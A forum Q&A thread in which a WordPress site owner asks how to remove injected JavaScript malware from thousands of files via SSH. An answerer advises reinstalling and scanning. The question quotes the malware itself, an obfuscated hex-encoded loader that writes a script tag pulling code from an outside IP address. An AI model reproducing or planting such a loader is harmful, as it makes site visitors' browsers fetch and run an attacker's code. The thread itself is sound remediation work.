# Wordpress Infected with malware - _0xaae8

Tags: wordpress, ssh, malware

I recently found out that my website is infected with js malware. 
Through a search, there are 3240 files that were infected with this script.

Just want to ask you guys how can I delete these infected files with this script using SSH

This is the malicious script :

> Blockquote

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document_0xaae8[5]var _0xaae8 =["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document_0xaae8[5]/**

> Blockquote

Thanks in advance !

Answer (score 1):

Download your wp-content folder and database, delete your current wordpress installation and install fresh copy of wordpress,

delete all unused themes and plugins from downloaded wp-content and scan that folder and database using your antivirus or using https://www.virustotal.com/ or any antivirus from your linux OS ( if you're using linux )

its better if you'll also delete all the plugins and re-install a fresh copy from wordpress plugins repo, so you only have to scan the current theme being use and the database, if you have enough time, you can dig on the theme files to make sure theres no more malicious code.

re-upload the database and replace the wp-content of your fresh wordpress install from the scan wp-content of the old install.

Comment: Thanks ! But I am thinking of a way like deleting the files directly via SSH by searching the keyword _0xaae8 - unluckily I am not that familiar with regex  :(